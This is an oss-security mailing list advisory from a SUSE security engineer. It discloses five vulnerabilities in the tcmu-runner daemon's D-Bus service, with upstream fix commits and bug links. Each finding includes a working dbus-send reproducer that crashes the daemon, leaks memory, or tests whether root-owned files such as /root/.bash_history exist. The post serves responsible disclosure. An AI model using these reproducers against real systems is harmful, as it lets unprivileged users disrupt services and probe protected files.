[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] tcmu-runner: multiple vulnerabilities in tcmu-runner daemon allowing local DoS, infor
From: Matthias Gerstner <mgerstner () suse ! de>
Date: 2017-07-24 10:12:04
Message-ID: 20170724101204.GA22772 () f195 ! suse ! de
[Download RAW message or body]
A security audit of tcmu-runner's D-Bus service implementation showed a
number of security issues.
I've requested CVEs for these issues, request is still pending. I will
update once I've got them.
It seems upstream will remove the D-Bus interface completely from the
tcmu-runner daemon in the future.
Package: https://github.com/open-iscsi/tcmu-runner
------------------------------------------------------------------------
glfs handler allows local DoS via crafted CheckConfig strings
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_glfs.so and cause various kinds of segmentation faults,
depending on the string passed to the method.
For example the "hosts" variable in glfs_check_config() is not zero
initialized, but always freed on error, causing invalid free and/or
invalid memory accesses.
References:
- The check_config callback implementation was recently removed upstream
in this commit:
https://github.com/open-iscsi/tcmu-runner/commit/61bd03e600d2abf309173e9186f4d465bb1b7157
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049485
Reproducer:
# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/glfs \
org.kernel.TCMUService1.CheckConfig string:something # -> tcmu-runner daemon will have crashed \
with segmentation fault
------------------------------------------------------------------------
UnregisterHandler dbus method in tcmu-runner daemon for non-existing
handler causes DoS
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of an unknown tcmu runner handler as parameter and cause a NULL
pointer dereference.
References:
- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/e2d953050766ac538615a811c64b34358614edce
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049488
Reproducer:
# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
/org/kernel/TCMUService1/HandlerManager1 \
org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:fake_handler # -> tcmu-runner \
daemon will have crashed with segmentation fault
------------------------------------------------------------------------
UnregisterHandler D-Bus method in tcmu-runner daemon for internal
handler causes DoS
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of a handler loaded internally in tcmu-runner via dlopen() and
cause a NULL pointer dereference resulting in DoS.
References:
- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/bb80e9c7a798f035768260ebdadffb6eb0786178
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049489
Reproducer:
# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user, it will attempt to unregister the
# locally loaded qcow handler
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
/org/kernel/TCMUService1/HandlerManager1 \
org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:qcow # -> tcmu-runner daemon \
will have crashed with segmentation fault
------------------------------------------------------------------------
Memory leaks can be triggered in tcmu-runner daemon by calling D-Bus
method for (Un)RegisterHandler
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
RegisterHandler or UnregisterHandler methods implemented in the
tcmu-runner daemon to trigger memory leaks. Done so repeatedly would
cause a root daemon to hog memory, possibly resulting in DoS for the
daemon itself or other system components that fail to acquire memory as
a result.
References:
- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/7a78eda52d973d3edc06fea84ad874678d6055f0
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049490
Reproducer:
# *stop* the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run the tcmu-runner service as root in valgrind
valgrind --max-stackframe=2097208 --leak-check=full /usr/bin/tcmu-runner
# run this dbus command multiple times as a regular user (this will trigger
# the leak in RegisterHandler)
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
/org/kernel/TCMUService1/HandlerManager1 \
org.kernel.TCMUService1.HandlerManager1.RegisterHandler string:0memory string:stuff # ctrl-c \
the valgrind process and you'll see an amount of "definitely lost" # bytes. when doing the same \
without the dbus-send calls this sould be zero # "definitely lost" bytes
------------------------------------------------------------------------
qcow handler opens up an information leak via the CheckConfig D-Bus
method
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_qcow.so and exploit an information leak by passing in arbitrary
filenames to check.
This allows a local user to check for the existence of root owned files,
which might enable more serious security issues in combination with
other security flaws in a system.
References:
- upstream fix:
This one is difficult to fix, upstream asked me to remove all
check_config callbacks instead:
https://github.com/open-iscsi/tcmu-runner/commit/8cf8208775022301adaa59c240bb7f93742d1329
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049491
Reproducer:
# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/qcow \
org.kernel.TCMUService1.CheckConfig string://root/.bash_history # this will return True if \
/root/.bash_history exists, False otherwise
Regards
Matthias
--
Matthias Gerstner <matthias.gerstner@suse.de>
Dipl.-Wirtsch.-Inf. (FH), Security Engineer
https://www.suse.com/security
Telefon: +49 911 740 53 290
SUSE Linux GmbH
GF: Felix Imendörffer, Jane Smithard, Graham Norton
HRB 21284 (AG Nuernberg)
["signature.asc" (application/pgp-signature)]
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic